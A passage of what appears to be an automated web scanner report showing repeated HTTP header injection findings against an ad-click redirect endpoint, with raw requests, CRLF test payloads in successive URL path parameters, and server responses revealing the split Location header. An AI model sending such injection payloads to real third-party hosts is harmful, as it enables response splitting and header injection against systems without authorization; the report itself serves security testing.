Set-Cookie: ANON_ID=aonFNfq0I1pDyNylQvm1Tr1GjUUR7dZaATZaSiKqNI8GVYjLZdUUa4sZbk3TqOMru17W82ZbJauWs5ARJKWyAPTpGrkurVMZdEdkEIGHp9Zcf4vICcLp7Noa7KZbNPiHdk7xHZdWZaUuCuYmAgc3Q93VooUuKOmddKuwSMGVS9ZcrGvVfSRvnrEZaSvwPM6g6byE0FYkryUst3TpxnABruqFkVSBgwMXBhZbsPoRZb4Zb1lKxZbZcRJZdNdXKHwarm9bb183lslT6ZdFWHods6INBNY6ag4M6Zcxf3oXLm4Q5UpdrHSeN14lCiroZcvU7C7jnZddLKINS1uVNllVZaxXsnGKJ6m3g3a1aIE1TeguIUVZaZbdmbWCydqoTvb6bepmGuqq5NdTreK4chBNS5OZcbX2UsZapEXofVal5M8hm0cjmII6Id4bfOGMmBuuJ2drl35lXovwDPs9XUmebYXoMM7qbGArWlESPM7QjwQ1Zcgsbcy6mZaXpEoymYURdgFMgGahcAD0AbG14YlhRjgnHO8w83FNagAeOOuqF0orTEsYSURX8Zbx1DYB3vS1PG5E3JTZa1PrrHHGPPYfV14mtnuMJGZbPikx; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:01 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/6be6d
319c4e9da96/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 11 is copied into the Location response header. The payload 666e5%0d%0a192a02a2baf was submitted in the REST URL parameter 11. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/666e5%0d%0a192a02a2baf/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aVnFNfpyXanFqiV3EGmyfa3pJS2dFZcKpjZc14Cv0wOd5ZcbF6Vfr0FnMSsZa7mneZbgTGSeea6ScVQPw0s0TmwSTUQYaksCrRsLuWUxrRmnJZbMZcgkEO6JEZai8kZaUhy84LTpkyKBlfZdILg8YPJIv7qmDjARaO20YyZcTxDRZbC2ZdjTGnbwmaMxJyPKf2jTVS4SJJMwApsnSScb67SxQcF1Q5YtjFM7cfZc3O0kT3GCG2gMjyZdEHdHBnopHbZbcV7tgNBZcyUZcn0mdX8svOm1eXroaJy8oOs7XaxSwRQkU1HYV3K7QASX2sKlCopsZdvqj3vAIphNAGeyvTdKQa6Tx5WLFkPxwIwXqqHqGgBPZdZbZascwCbyZdUjZaXdbQrZbSCRTqqNqdSMsSagHnkV7yZaZavNV4WxBsnKuSq3FLMEej5jhWc7IF37Zb1pMxRhHsmKVkwr5PM87NSOZcyRWmZc963AKbHxorYNoBkj6D7mPmJmWBAQpCUiYrRn5ekucGMc4Cra1I3abSeAPGG6p76DvqstlYlHsDR65cQJYqeD4WfMRsMe1KgYXqWJvxJjRHMxeEwBTgUFUw9fyu35MKcEsL; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:18 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/666e5
192a02a2baf/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 12 is copied into the Location response header. The payload cfa7e%0d%0ae6cd7c479db was submitted in the REST URL parameter 12. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/cfa7e%0d%0ae6cd7c479db/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aUnFNfON6JoCZbUxwbyU43L3PJd2TYxKQ6CulogRwxe5y32H9Y00T7R1TE6NRe2lH4vZc2y1VbCj3egjNarByCvDxDwrDcReZaXchURtE52f6J0gqo6FOBZacMlQWPgiLUm4mTLKT9Zdx8K48Zb0vC6ALZaee8gBPWZbkjqAwQIfDiwnIooanExvT6Bue7xBGhNZcPXn7ZdtMPpbhSFRpbWK2SSJtZbvNgqy7wNciR2wSZcZakE7NL8Js4gS7l9hkV6grt3Bf7hdDSvJukmrMIsh5ZaLJk3XW3CZcXHxdw7Zb1UvKUriwoYAWW2EosbHDYZdeaCU1IJMIO75w8CgSL2Cup2Xm7a2r2BIKZcmHO8QZdZa57cGErgAEZbY3ok7ZdoQ0UAewD87PZd07hEZbg0P5td4BZd1l0nV4FuCp0WyV3QYZb3Be5nnWcwaayqpgrYTlGTcQZa2llBihQ0VQOsGy42ZdiLohyRdiPaZdlhAQnhZbRSr5ZaG7ZajZdZbJCkTtOfxSRJXKb6JOZdoNTDfQqoZb8ZcwA0PlY2hqBNXHNYnTKrTJBFxd1pZaSEnxVKj6ndrTOcYSmMAKxOYxuUhZaEJf30feotZbZcy5mUUM; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:32 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/cfa7e
e6cd7c479db/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 13 is copied into the Location response header. The payload da7af%0d%0ad7c94f7af3e was submitted in the REST URL parameter 13. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/da7af%0d%0ad7c94f7af3e/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=acnFser2PZaKcjQAQ3Zcev4yiMwZdItjjPQ1sSBXYq5tQ4OMDtARO3PVsmknZbK6Im64aN0tWcymkFNfp7TMZcghJ4XWp0QRDZa91qEmvTAPRBo03DXC97G0cJXLiAtflTvPedXJ2xdZaAjkSEdxZcgZa9O68nHZdQKi7DSqD8uC9ZaOBiXKyVK2NmYqlxlUr3eJ5mZdxbe5OeKyNVAm0PeIkNt8KCkSKebUwIBxbrPSdF1CG6H8jgP87KV1TlfOcJodwyLFVfBvUI28mpX2bFaDd0FBI77pVSaqMSQeZcrLOAYBVdMjZc8AaomB4H8Gs0jYHvDHXV5wdmCwkdh1eqjfQyIDqOvk7L6y7esZaOUpVCIByUDEZbL40DayN9CnVKSSCyQL7XnjE81QFvmCvtlaiEWoIUOTbvV8ZdQ6G3q880JutZawxT6ENw1oYZaBQPdscA8qgRfnbNSx1EcE3yulM45cQnJRviGfrkJYRayUZaHgtyCpB9STGXNAZdZbZcqdVvayoUh5usHlQRrBqoNuW1InOZdCFD7N9YZd0noD4ZcRpkN3uApZboNZdSBkZaE2JTWYkIVtFri9JQWYPJOjqeEcxqCZaH; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:53 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/da7af
d7c94f7af3e/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 14 is copied into the Location response header. The payload e9019%0d%0ad83d5d2d9a9 was submitted in the REST URL parameter 14. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/e9019%0d%0ad83d5d2d9a9/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aSnFNfN3IdNpIdwKUMVZa6pQBnV3WrDJCAPS5OJ3Ktv2ijBGTnYwbUu0dy9s7uUhaobGXuwwHNm2IoHOSa9RR3g0bcFjss4LLgKvC1I5yQOdY80NAbIZdZa4JdHhSZc5tVuNIXAgvUZdZdkdXo7avmiuJji5feAQSggoO641ZcvkT4cPtqAT5tNZabZafPROcZciMZcTVwV5FwDt7c6U2Nd4U2c5stOMmfsIcWkhlUM8TB28WlN5DEEkwpAgR628beal0lieQc8Gy9LlKq46XdkJvI4jYTZdOsTVDVx879VggH42tQVm1G5TChamh0lYPeTemKrxju1fZc48WZdMk0ZdBYPvZc3CZb9cPg0cYN772xW7UITGPeBYMKnZdZawOVr65qD0UXYc8ZdtnfRmdxiNiv11V2PZcfGCBVlNtYcRZd2Aiurk2G4k8iYLZc8BQf8nM3LEg8PTXUM4VysCoUh54Za7lu5Ty4fZbcqAaMTZb6Wx2Zcoc7MCZcZc9sSulbe3R3vHWPY5ktZd5n3Ts9Ub6OJ6QZcZaYBHAEYaVtMbZdHUvnEurcLACyAwUcU98HdOZdhw2AnQJhZdEwZdMeirMD28UXwL3HSmSW3I; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:08 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/e9019
d83d5d2d9a9/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 15 is copied into the Location response header. The payload a2350%0d%0a75336dd4efc was submitted in the REST URL parameter 15. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/a2350%0d%0a75336dd4efc/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ainFNft3erwAAxv5ACp5UsSCfRTc3eDBInYZcpZb3e5X4lJZbZccXrwtmyRG7kpCXcbsRZbGZaPluq1EQgsFonmUxHjInHpCZbTV0D0cuoC87mJvCGvo6OCJkJNZcx9bpmZd5pAy4XjDerDeZdcovmbZd0QIZaF4qLleJW0KsHR9wKZcgKZbSmv1mV6GVKInZbhXnpqN81ffmroxZbqSWs9nJEos0ZdXVOtNkvuaVur4x1j2YCFHeVo8MSvZbFNuRRZcYjxCP6EdlbZdBHB9Zd7flCLM4AK93BbLLucn2KpVU1RoSJI2f8cTZbxUVRpd3WcdiCCslLri2JjHmXZbLULks8DdeifgrToMZaP6YUZdF0xZbxhcBN1SfEEcZbPQesI8ZakigFWtZavonKd2xNBZctrOVPtZcly6ly14JnZajj76o1oEBoTZdUGbXf1nFwO8OMRDqeMjqFayOAN9R2xYlkX0QOT0ZdxVCnZdl0F6Gb28kET3UEnSpQkCreeoZaHHVCN1QZbPQQDZcVA1NySERVM7ND3Pg26ssZdFEL9jFPasbvVH1Viax3cSZcCBaEpaZcNf7ZdGr4dN28YmLehIoMTEidXHTBiUOhMqPRmYr4; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:20 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/a2350
75336dd4efc/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 16 is copied into the Location response header. The payload dee83%0d%0a6de87aa61b3 was submitted in the REST URL parameter 16. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/dee83%0d%0a6de87aa61b3/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=apnFNfRkP6sAeCnM78ThQZcqPBHtrraZbSTRTZaxKPlHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8ZciRwwLZa3JYbnZafG45PvWwGatZbMytdgEvXlSvq8otAugu1CMIvGIrthJVCvyBodgpRie5UQg9MBouk7vNuHVxPGSDPO6QeTa3Rk4v12VZcZbi5FiZdWLCHNhrC1yCkRoldOxejZbVJQddb1chXju5l3f2DfYGVeZcLnHpHQA7ERxNFYZdpR1UhZbxqcygBLWGKEF4xyF3hP01u4cgs57JZcS3P7JsY9MGH9VaZaec9Fxtj6dE6DoUyRZb5Zb6fRS4SqZdnoRyXI4SZdETFPF9NbZbm3XMNbWinrBt46wdJZc2ZbXedMZabWEoCij3dLGikaajW34BYiAuLXywJSTNxwiguL9g7WUPyljk0ZaEn7g6K03i43aMtXACCJq5Xw49UnBTAIYiG7MDjDn6FEdNidNMjCHWJbrWZcmrVl84ZcF1wRWsbSZaQPtcodpSbu2lvQbB0jLhSqN3bFcfkVOiWj8BbhRY88i; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:45 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/dee83
6de87aa61b3/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
